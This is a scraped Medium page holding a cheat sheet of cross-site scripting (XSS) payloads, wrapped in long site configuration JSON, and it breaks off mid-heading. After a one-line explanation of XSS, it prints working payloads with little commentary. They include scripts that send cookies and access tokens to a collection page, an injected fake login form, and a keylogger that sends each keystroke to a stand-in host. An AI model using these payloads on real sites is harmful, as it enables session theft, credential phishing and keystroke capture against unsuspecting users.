\"https:\/\/androx47.medium.com\/_\/graphql\"\u003c\/script\u003e\u003cscript\u003ewindow.__PRELOADED_STATE__ = {\"algolia\":{\"queries\":{}},\"cache\":{\"experimentGroupSet\":true,\"reason\":\"\",\"group\":\"enabled\",\"tags\":[\"group-edgeCachePosts\",\"post-6a492d795c0\",\"user-6a7d492724f5\"],\"serverVariantState\":\"44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a\",\"middlewareEnabled\":true,\"cacheStatus\":\"DYNAMIC\",\"shouldUseCache\":true,\"vary\":[],\"lohpSummerUpsellEnabled\":false,\"logoUpdatePhase3Enabled\":false},\"client\":{\"hydrated\":false,\"isUs\":false,\"isNativeMedium\":false,\"isSafariMobile\":false,\"isSafari\":false,\"isFirefox\":true,\"routingEntity\":{\"type\":\"USER\",\"id\":\"6a7d492724f5\",\"explicit\":true},\"viewerIsBot\":false},\"debug\":{\"requestId\":\"abbdbdac-74bb-44b0-997b-4fe4b679c9d9\",\"hybridDevServices\":[],\"originalSpanCarrier\":{\"traceparent\":\"00-d8a93ea807161ae567e099d8492ad835-d586774e57c461d2-01\"}},\"multiVote\":{\"clapsPerPost\":{}},\"navigation\":{\"branch\":{\"show\":null,\"hasRendered\":null,\"blockedByCTA\":false},\"hideGoogleOneTap\":false,\"hasRenderedAlternateUserBanner\":null,\"currentLocation\":\"https:\\u002F\\u002Fandrox47.medium.com\\u002Fcross-site-scripting-xss-payloads-6a492d795c0\",\"host\":\"androx47.medium.com\",\"hostname\":\"androx47.medium.com\",\"referrer\":\"\",\"hasSetReferrer\":false,\"susiModal\":{\"step\":null,\"operation\":\"register\"},\"postRead\":false,\"partnerProgram\":{\"selectedCountryCode\":null},\"queryString\":\"\",\"currentHash\":\"\"},\"config\":{\"nodeEnv\":\"production\",\"version\":\"main-20240904-210155-4f1a2e4d5e\",\"target\":\"production\",\"productName\":\"Medium\",\"publicUrl\":\"https:\\u002F\\u002Fcdn-client.medium.com\\u002Flite\",\"authDomain\":\"medium.com\",\"authGoogleClientId\":\"216296035834-k1k6qe060s2tp2a2jam4ljdcms00sttg.apps.googleusercontent.com\",\"favicon\":\"production\",\"glyphUrl\":\"https:\\u002F\\u002Fglyph.medium.com\",\"branchKey\":\"key_live_ofxXr2qTrrU9NqURK8ZwEhknBxiI6KBm\",\"algolia\":{\"appId\":\"MQ57UUUQZ2\",\"apiKeySearch\":\"394474ced050e3911ae2249ecc774921\",\"indexPrefix\":\"medium_\",\"host\":\"-dsn.algolia.net\"},\"recaptchaKey\":\"6Lfc37IUAAAAAKGGtC6rLS13R1Hrw_BqADfS1LRk\",\"recaptcha3Key\":\"6Lf8R9wUAAAAABMI_85Wb8melS7Zj6ziuf99Yot5\",\"recaptchaEnterpriseKeyId\":\"6Le-uGgpAAAAAPprRaokM8AKthQ9KNGdoxaGUvVp\",\"datadog\":{\"applicationId\":\"6702d87d-a7e0-42fe-bbcb-95b469547ea0\",\"clientToken\":\"pub853ea8d17ad6821d9f8f11861d23dfed\",\"rumToken\":\"pubf9cc52896502b9413b68ba36fc0c7162\",\"context\":{\"deployment\":{\"target\":\"production\",\"tag\":\"main-20240904-210155-4f1a2e4d5e\",\"commit\":\"4f1a2e4d5e0ee53281f46a6f22617bed7e204285\"}},\"datacenter\":\"us\"},\"googleAnalyticsCode\":\"G-7JY7T788PK\",\"googlePay\":{\"apiVersion\":\"2\",\"apiVersionMinor\":\"0\",\"merchantId\":\"BCR2DN6TV7EMTGBM\",\"merchantName\":\"Medium\",\"instanceMerchantId\":\"13685562959212738550\"},\"applePay\":{\"version\":3},\"signInWallCustomDomainCollectionIds\":[\"3a8144eabfe3\",\"336d898217ee\",\"61061eb0c96b\",\"138adf9c44c\",\"819cc2aaeee0\"],\"mediumMastodonDomainName\":\"me.dm\",\"mediumOwnedAndOperatedCollectionIds\":[\"8a9336e5bb4\",\"b7e45b22fec3\",\"193b68bd4fba\",\"8d6b8a439e32\",\"54c98c43354d\",\"3f6ecf56618\",\"d944778ce714\",\"92d2092dc598\",\"ae2a65f35510\",\"1285ba81cada\",\"544c7006046e\",\"fc8964313712\",\"40187e704f1c\",\"88d9857e584e\",\"7b6769f2748b\",\"bcc38c8f6edf\",\"cef6983b292\",\"cb8577c9149e\",\"444d13b52878\",\"713d7dbc99b0\",\"ef8e90590e66\",\"191186aaafa0\",\"55760f21cdc5\",\"9dc80918cc93\",\"bdc4052bbdba\",\"8ccfed20cbb2\"],\"tierOneDomains\":[\"medium.com\",\"thebolditalic.com\",\"arcdigital.media\",\"towardsdatascience.com\",\"uxdesign.cc\",\"codeburst.io\",\"psiloveyou.xyz\",\"writingcooperative.com\",\"entrepreneurshandbook.co\",\"prototypr.io\",\"betterhumans.coach.me\",\"theascent.pub\"],\"topicsToFollow\":[\"d61cf867d93f\",\"8a146bc21b28\",\"1eca0103fff3\",\"4d562ee63426\",\"aef1078a3ef5\",\"e15e46793f8d\",\"6158eb913466\",\"55f1c20aba7a\",\"3d18b94f6858\",\"4861fee224fd\",\"63c6f1f93ee\",\"1d98b3a9a871\",\"decb52b64abf\",\"ae5d4995e225\",\"830cded25262\"],\"topicToTagMappings\":{\"accessibility\":\"accessibility\",\"addiction\":\"addiction\",\"android-development\":\"android-development\",\"art\":\"art\",\"artificial-intelligence\":\"artificial-intelligence\",\"astrology\":\"astrology\",\"basic-income\":\"basic-income\",\"beauty\":\"beauty\",\"biotech\":\"biotech\",\"blockchain\":\"blockchain\",\"books\":\"books\",\"business\":\"business\",\"cannabis\":\"cannabis\",\"cities\":\"cities\",\"climate-change\":\"climate-change\",\"comics\":\"comics\",\"coronavirus\":\"coronavirus\",\"creativity\":\"creativity\",\"cryptocurrency\":\"cryptocurrency\",\"culture\":\"culture\",\"cybersecurity\":\"cybersecurity\",\"data-science\":\"data-science\",\"design\":\"design\",\"digital-life\":\"digital-life\",\"disability\":\"disability\",\"economy\":\"economy\",\"education\":\"education\",\"equality\":\"equality\",\"family\":\"family\",\"feminism\":\"feminism\",\"fiction\":\"fiction\",\"film\":\"film\",\"fitness\":\"fitness\",\"food\":\"food\",\"freelancing\":\"freelancing\",\"future\":\"future\",\"gadgets\":\"gadgets\",\"gaming\":\"gaming\",\"gun-control\":\"gun-control\",\"health\":\"health\",\"history\":\"history\",\"humor\":\"humor\",\"immigration\":\"immigration\",\"ios-development\":\"ios-development\",\"javascript\":\"javascript\",\"justice\":\"justice\",\"language\":\"language\",\"leadership\":\"leadership\",\"lgbtqia\":\"lgbtqia\",\"lifestyle\":\"lifestyle\",\"machine-learning\":\"machine-learning\",\"makers\":\"makers\",\"marketing\":\"marketing\",\"math\":\"math\",\"media\":\"media\",\"mental-health\":\"mental-health\",\"mindfulness\":\"mindfulness\",\"money\":\"money\",\"music\":\"music\",\"neuroscience\":\"neuroscience\",\"nonfiction\":\"nonfiction\",\"outdoors\":\"outdoors\",\"parenting\":\"parenting\",\"pets\":\"pets\",\"philosophy\":\"philosophy\",\"photography\":\"photography\",\"podcasts\":\"podcast\",\"poetry\":\"poetry\",\"politics\":\"politics\",\"privacy\":\"privacy\",\"product-management\":\"product-management\",\"productivity\":\"productivity\",\"programming\":\"programming\",\"psychedelics\":\"psychedelics\",\"psychology\":\"psychology\",\"race\":\"race\",\"relationships\":\"relationships\",\"religion\":\"religion\",\"remote-work\":\"remote-work\",\"san-francisco\":\"san-francisco\",\"science\":\"science\",\"self\":\"self\",\"self-driving-cars\":\"self-driving-cars\",\"sexuality\":\"sexuality\",\"social-media\":\"social-media\",\"society\":\"society\",\"software-engineering\":\"software-engineering\",\"space\":\"space\",\"spirituality\":\"spirituality\",\"sports\":\"sports\",\"startups\":\"startup\",\"style\":\"style\",\"technology\":\"technology\",\"transportation\":\"transportation\",\"travel\":\"travel\",\"true-crime\":\"true-crime\",\"tv\":\"tv\",\"ux\":\"ux\",\"venture-capital\":\"venture-capital\",\"visual-design\":\"visual-design\",\"work\":\"work\",\"world\":\"world\",\"writing\":\"writing\"},\"defaultImages\":{\"avatar\":{\"imageId\":\"1*dmbNkD5D-u45r44go_cf0g.png\",\"height\":150,\"width\":150},\"orgLogo\":{\"imageId\":\"7*V1_7XP4snlmqrc_0Njontw.png\",\"height\":110,\"width\":500},\"postLogo\":{\"imageId\":\"bd978bb536350a710e8efb012513429cabdc4c28700604261aeda246d0f980b7\",\"height\":810,\"width\":1440},\"postPreviewImage\":{\"imageId\":\"1*hn4v1tCaJy7cWMyb0bpNpQ.png\",\"height\":386,\"width\":579}},\"collectionStructuredData\":{\"8d6b8a439e32\":{\"name\":\"Elemental\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fcdn-images-1.medium.com\\u002Fmax\\u002F980\\u002F1*9ygdqoKprhwuTVKUM0DLPA@2x.png\",\"width\":980,\"height\":159}}},\"3f6ecf56618\":{\"name\":\"Forge\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fcdn-images-1.medium.com\\u002Fmax\\u002F596\\u002F1*uULpIlImcO5TDuBZ6lm7Lg@2x.png\",\"width\":596,\"height\":183}}},\"ae2a65f35510\":{\"name\":\"GEN\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fmax\\u002F264\\u002F1*RdVZMdvfV3YiZTw6mX7yWA.png\",\"width\":264,\"height\":140}}},\"88d9857e584e\":{\"name\":\"LEVEL\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fmax\\u002F540\\u002F1*JqYMhNX6KNNb2UlqGqO2WQ.png\",\"width\":540,\"height\":108}}},\"7b6769f2748b\":{\"name\":\"Marker\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fcdn-images-1.medium.com\\u002Fmax\\u002F383\\u002F1*haCUs0wF6TgOOvfoY-jEoQ@2x.png\",\"width\":383,\"height\":92}}},\"444d13b52878\":{\"name\":\"OneZero\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fmax\\u002F540\\u002F1*cw32fIqCbRWzwJaoQw6BUg.png\",\"width\":540,\"height\":123}}},\"8ccfed20cbb2\":{\"name\":\"Zora\",\"data\":{\"@type\":\"NewsMediaOrganization\",\"ethicsPolicy\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Farticles\\u002F360043290473\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fmax\\u002F540\\u002F1*tZUQqRcCCZDXjjiZ4bDvgQ.png\",\"width\":540,\"height\":106}}}},\"embeddedPostIds\":{\"coronavirus\":\"cd3010f9d81f\"},\"sharedCdcMessaging\":{\"COVID_APPLICABLE_TAG_SLUGS\":[],\"COVID_APPLICABLE_TOPIC_NAMES\":[],\"COVID_APPLICABLE_TOPIC_NAMES_FOR_TOPIC_PAGE\":[],\"COVID_MESSAGES\":{\"tierA\":{\"text\":\"For more information on the novel coronavirus and Covid-19, visit cdc.gov.\",\"markups\":[{\"start\":66,\"end\":73,\"href\":\"https:\\u002F\\u002Fwww.cdc.gov\\u002Fcoronavirus\\u002F2019-nCoV\"}]},\"tierB\":{\"text\":\"Anyone can publish on Medium per our Policies, but we don’t fact-check every story. For more info about the coronavirus, see cdc.gov.\",\"markups\":[{\"start\":37,\"end\":45,\"href\":\"https:\\u002F\\u002Fhelp.medium.com\\u002Fhc\\u002Fen-us\\u002Fcategories\\u002F201931128-Policies-Safety\"},{\"start\":125,\"end\":132,\"href\":\"https:\\u002F\\u002Fwww.cdc.gov\\u002Fcoronavirus\\u002F2019-nCoV\"}]},\"paywall\":{\"text\":\"This article has been made free for everyone, thanks to Medium Members. For more information on the novel coronavirus and Covid-19, visit cdc.gov.\",\"markups\":[{\"start\":56,\"end\":70,\"href\":\"https:\\u002F\\u002Fmedium.com\\u002Fmembership\"},{\"start\":138,\"end\":145,\"href\":\"https:\\u002F\\u002Fwww.cdc.gov\\u002Fcoronavirus\\u002F2019-nCoV\"}]},\"unbound\":{\"text\":\"This article is free for everyone, thanks to Medium Members. For more information on the novel coronavirus and Covid-19, visit cdc.gov.\",\"markups\":[{\"start\":45,\"end\":59,\"href\":\"https:\\u002F\\u002Fmedium.com\\u002Fmembership\"},{\"start\":127,\"end\":134,\"href\":\"https:\\u002F\\u002Fwww.cdc.gov\\u002Fcoronavirus\\u002F2019-nCoV\"}]}},\"COVID_BANNER_POST_ID_OVERRIDE_WHITELIST\":[\"3b31a67bff4a\"]},\"sharedVoteMessaging\":{\"TAGS\":[\"politics\",\"election-2020\",\"government\",\"us-politics\",\"election\",\"2020-presidential-race\",\"trump\",\"donald-trump\",\"democrats\",\"republicans\",\"congress\",\"republican-party\",\"democratic-party\",\"biden\",\"joe-biden\",\"maga\"],\"TOPICS\":[\"politics\",\"election\"],\"MESSAGE\":{\"text\":\"Find out more about the U.S. election results here.\",\"markups\":[{\"start\":46,\"end\":50,\"href\":\"https:\\u002F\\u002Fcookpolitical.com\\u002F2020-national-popular-vote-tracker\"}]},\"EXCLUDE_POSTS\":[\"397ef29e3ca5\"]},\"embedPostRules\":[],\"recircOptions\":{\"v1\":{\"limit\":3},\"v2\":{\"limit\":8}},\"braintreeClientKey\":\"production_zjkj96jm_m56f8fqpf7ngnrd4\",\"braintree\":{\"enabled\":true,\"merchantId\":\"m56f8fqpf7ngnrd4\",\"merchantAccountId\":{\"usd\":\"AMediumCorporation_instant\",\"eur\":\"amediumcorporation_EUR\",\"cad\":\"amediumcorporation_CAD\"},\"publicKey\":\"ds2nn34bg2z7j5gd\",\"braintreeEnvironment\":\"production\",\"dashboardUrl\":\"https:\\u002F\\u002Fwww.braintreegateway.com\\u002Fmerchants\",\"gracePeriodDurationInDays\":14,\"mediumMembershipPlanId\":{\"monthly\":\"ce105f8c57a3\",\"monthlyV2\":\"e8a5e126-792b-4ee6-8fba-d574c1b02fc5\",\"monthlyWithTrial\":\"d5ee3dbe3db8\",\"monthlyPremium\":\"fa741a9b47a2\",\"yearly\":\"a40ad4a43185\",\"yearlyV2\":\"3815d7d6-b8ca-4224-9b8c-182f9047866e\",\"yearlyStaff\":\"d74fb811198a\",\"yearlyWithTrial\":\"b3bc7350e5c7\",\"yearlyPremium\":\"e21bd2c12166\",\"monthlyOneYearFree\":\"e6c0637a-2bad-4171-ab4f-3c268633d83c\",\"monthly25PercentOffFirstYear\":\"235ecc62-0cdb-49ae-9378-726cd21c504b\",\"monthly20PercentOffFirstYear\":\"ba518864-9c13-4a99-91ca-411bf0cac756\",\"monthly15PercentOffFirstYear\":\"594c029b-9f89-43d5-88f8-8173af4e070e\",\"monthly10PercentOffFirstYear\":\"c6c7bc9a-40f2-4b51-8126-e28511d5bdb0\",\"monthlyForStudents\":\"629ebe51-da7d-41fd-8293-34cd2f2030a8\",\"yearlyOneYearFree\":\"78ba7be9-0d9f-4ece-aa3e-b54b826f2bf1\",\"yearly25PercentOffFirstYear\":\"2dbb010d-bb8f-4eeb-ad5c-a08509f42d34\",\"yearly20PercentOffFirstYear\":\"47565488-435b-47f8-bf93-40d5fbe0ebc8\",\"yearly15PercentOffFirstYear\":\"8259809b-0881-47d9-acf7-6c001c7f720f\",\"yearly10PercentOffFirstYear\":\"9dd694fb-96e1-472c-8d9e-3c868d5c1506\",\"yearlyForStudents\":\"e29345ef-ab1c-4234-95c5-70e50fe6bc23\",\"monthlyCad\":\"p52orjkaceei\",\"yearlyCad\":\"h4q9g2up9ktt\"},\"braintreeDiscountId\":{\"oneMonthFree\":\"MONTHS_FREE_01\",\"threeMonthsFree\":\"MONTHS_FREE_03\",\"sixMonthsFree\":\"MONTHS_FREE_06\",\"fiftyPercentOffOneYear\":\"FIFTY_PERCENT_OFF_ONE_YEAR\"},\"3DSecureVersion\":\"2\",\"defaultCurrency\":\"usd\",\"providerPlanIdCurrency\":{\"4ycw\":\"usd\",\"rz3b\":\"usd\",\"3kqm\":\"usd\",\"jzw6\":\"usd\",\"c2q2\":\"usd\",\"nnsw\":\"usd\",\"q8qw\":\"usd\",\"d9y6\":\"usd\",\"fx7w\":\"cad\",\"nwf2\":\"cad\"}},\"paypalClientId\":\"AXj1G4fotC2GE8KzWX9mSxCH1wmPE3nJglf4Z2ig_amnhvlMVX87otaq58niAg9iuLktVNF_1WCMnN7v\",\"paypal\":{\"host\":\"https:\\u002F\\u002Fapi.paypal.com:443\",\"clientMode\":\"production\",\"serverMode\":\"live\",\"webhookId\":\"4G466076A0294510S\",\"monthlyPlan\":{\"planId\":\"P-9WR0658853113943TMU5FDQA\",\"name\":\"Medium Membership (Monthly) with setup fee\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed monthly.\"},\"yearlyPlan\":{\"planId\":\"P-7N8963881P8875835MU5JOPQ\",\"name\":\"Medium Membership (Annual) with setup fee\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed annually.\"},\"oneYearGift\":{\"name\":\"Medium Membership (1 Year, Digital Gift Code)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Gift codes can be redeemed at medium.com\\u002Fredeem.\",\"price\":\"50.00\",\"currency\":\"USD\",\"sku\":\"membership-gift-1-yr\"},\"oldMonthlyPlan\":{\"planId\":\"P-96U02458LM656772MJZUVH2Y\",\"name\":\"Medium Membership (Monthly)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed monthly.\"},\"oldYearlyPlan\":{\"planId\":\"P-59P80963JF186412JJZU3SMI\",\"name\":\"Medium Membership (Annual)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed annually.\"},\"monthlyPlanWithTrial\":{\"planId\":\"P-66C21969LR178604GJPVKUKY\",\"name\":\"Medium Membership (Monthly) with setup fee\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed monthly.\"},\"yearlyPlanWithTrial\":{\"planId\":\"P-6XW32684EX226940VKCT2MFA\",\"name\":\"Medium Membership (Annual) with setup fee\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed annually.\"},\"oldMonthlyPlanNoSetupFee\":{\"planId\":\"P-4N046520HR188054PCJC7LJI\",\"name\":\"Medium Membership (Monthly)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed monthly.\"},\"oldYearlyPlanNoSetupFee\":{\"planId\":\"P-7A4913502Y5181304CJEJMXQ\",\"name\":\"Medium Membership (Annual)\",\"description\":\"Unlimited access to the best and brightest stories on Medium. Membership billed annually.\"},\"sdkUrl\":\"https:\\u002F\\u002Fwww.paypal.com\\u002Fsdk\\u002Fjs\"},\"stripePublishableKey\":\"pk_live_7FReX44VnNIInZwrIIx6ghjl\",\"log\":{\"json\":true,\"level\":\"info\"},\"imageUploadMaxSizeMb\":25,\"staffPicks\":{\"title\":\"Staff Picks\",\"catalogId\":\"c7bc6e1ee00f\"}},\"session\":{\"xsrf\":\"\"}}\u003c\/script\u003e\u003cscript\u003ewindow.__APOLLO_STATE__ = {\"ROOT_QUERY\":{\"__typename\":\"Query\",\"viewer\":null,\"collectionByDomainOrSlug({\\\"domainOrSlug\\\":\\\"androx47.medium.com\\\"})\":null,\"postResult({\\\"id\\\":\\\"6a492d795c0\\\"})\":{\"__ref\":\"Post:6a492d795c0\"}},\"LinkedAccounts:6a7d492724f5\":{\"__typename\":\"LinkedAccounts\",\"mastodon\":null,\"id\":\"6a7d492724f5\"},\"UserViewerEdge:userId:6a7d492724f5-viewerId:lo_2f5a867f56fa\":{\"__typename\":\"UserViewerEdge\",\"id\":\"userId:6a7d492724f5-viewerId:lo_2f5a867f56fa\",\"isFollowing\":false,\"isUser\":false,\"isMuting\":false},\"NewsletterV3:fa795b48caf5\":{\"__typename\":\"NewsletterV3\",\"id\":\"fa795b48caf5\",\"type\":\"NEWSLETTER_TYPE_AUTHOR\",\"slug\":\"6a7d492724f5\",\"name\":\"6a7d492724f5\",\"collection\":null,\"user\":{\"__ref\":\"User:6a7d492724f5\"}},\"User:6a7d492724f5\":{\"__typename\":\"User\",\"id\":\"6a7d492724f5\",\"name\":\"Pintu Solanki\",\"username\":\"androx47\",\"newsletterV3\":{\"__ref\":\"NewsletterV3:fa795b48caf5\"},\"linkedAccounts\":{\"__ref\":\"LinkedAccounts:6a7d492724f5\"},\"isSuspended\":false,\"imageId\":\"1*XmnNMYitXeyQnWuG-Yv_xQ.jpeg\",\"mediumMemberAt\":0,\"verifications\":{\"__typename\":\"VerifiedInfo\",\"isBookAuthor\":false},\"socialStats\":{\"__typename\":\"SocialStats\",\"followerCount\":92},\"customDomainState\":{\"__typename\":\"CustomDomainState\",\"live\":{\"__typename\":\"CustomDomain\",\"domain\":\"androx47.medium.com\"}},\"hasSubdomain\":true,\"bio\":\"With the new day comes new strength and new thoughts.\",\"isPartnerProgramEnrolled\":false,\"viewerEdge\":{\"__ref\":\"UserViewerEdge:userId:6a7d492724f5-viewerId:lo_2f5a867f56fa\"},\"viewerIsUser\":false,\"postSubscribeMembershipUpsellShownAt\":0,\"allowNotes\":true,\"twitterScreenName\":\"androx47\",\"membership\":null},\"Paragraph:3dfccc9ad6b7_0\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_0\",\"name\":\"579f\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Cross site scripting (XSS) Payloads\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":20,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null},{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":22,\"end\":25,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_1\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_1\",\"name\":\"e497\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"How does XSS work?\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_2\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_2\",\"name\":\"5429\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim’s browser, the attacker can fully compromise their interaction with the application.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":26,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_3\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_3\",\"name\":\"4dde\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Data grabber for XSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_4\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_4\",\"name\":\"7d70\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_5\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_5\",\"name\":\"3827\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003Edocument.location='http:\\u002F\\u002Flocalhost\\u002FXSS\\u002Fgrabber.php?c='+document.cookie\\u003C\\u002Fscript\\u003E\\n\\u003Cscript\\u003Edocument.location='http:\\u002F\\u002Flocalhost\\u002FXSS\\u002Fgrabber.php?c='+localStorage.getItem('access_token')\\u003C\\u002Fscript\\u003E\\n\\u003Cscript\\u003Enew Image().src=\\\"http:\\u002F\\u002Flocalhost\\u002Fcookie.php?c=\\\"+document.cookie;\\u003C\\u002Fscript\\u003E\\n\\u003Cscript\\u003Enew Image().src=\\\"http:\\u002F\\u002Flocalhost\\u002Fcookie.php?c=\\\"+localStorage.getItem('access_token');\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_6\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_6\",\"name\":\"4e0e\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"UI redressing\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_7\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_7\",\"name\":\"c617\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Leverage the XSS to modify the HTML content of the page in order to display a fake login form.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_8\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_8\",\"name\":\"67d7\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003E\\nhistory.replaceState(null, null, '..\\u002F..\\u002F..\\u002Flogin');\\ndocument.body.innerHTML = \\\"\\u003C\\u002Fbr\\u003E\\u003C\\u002Fbr\\u003E\\u003C\\u002Fbr\\u003E\\u003C\\u002Fbr\\u003E\\u003C\\u002Fbr\\u003E\\u003Ch1\\u003EPlease login to continue\\u003C\\u002Fh1\\u003E\\u003Cform\\u003EUsername: \\u003Cinput type='text'\\u003EPassword: \\u003Cinput type='password'\\u003E\\u003C\\u002Fform\\u003E\\u003Cinput value='submit' type='submit'\\u003E\\\"\\n\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_9\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_9\",\"name\":\"92d9\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Javascript keylogger\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_10\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_10\",\"name\":\"909e\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Another way to collect sensitive data is to set a javascript keylogger.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_11\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_11\",\"name\":\"6bee\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cimg src=x onerror='document.onkeypress=function(e){fetch(\\\"http:\\u002F\\u002Fdomain.com?k=\\\"+String.fromCharCode(e.which))},this.remove();'\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_12\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_12\",\"name\":\"810b\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in 